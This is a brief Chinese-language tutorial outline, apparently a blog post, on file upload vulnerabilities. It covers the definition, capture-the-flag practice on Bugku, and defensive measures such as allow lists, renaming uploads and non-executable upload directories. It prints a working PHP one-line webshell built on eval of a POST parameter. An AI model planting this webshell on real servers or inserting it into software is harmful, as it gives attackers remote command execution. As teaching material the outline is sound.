目录
文件上传漏洞定义
文件上传漏洞是攻击者通过文件上传点上传恶意文件,如木马、脚本等,最终一般会通过shell管理工具(如蚁剑、哥斯拉等)连接从而控制系统的漏洞、
文件上传漏洞利用
一句话木马
利用直接的可命令执行的危险函数,主要用在基础靶场中,比较方便,实战中特征太明显了
php一句话木马
<?php
eval($_POST['shell']);
?>这里POST可以根据需要更改。
靶场、实战练习
平台Bugku
Bugku - 2023 HackINI Upload0 详解-CSDN博客
文件上传漏洞防御
验证
对文件扩展名、类型、内容进行白名单、黑名单、沙箱杀软等验证
策略
上传目录分离(上传文件目录不在指定目录,放在其他目录或者其他服务器);
强制上传后更改文件名、文件后缀;
上传文件存储目录不给予执行权限;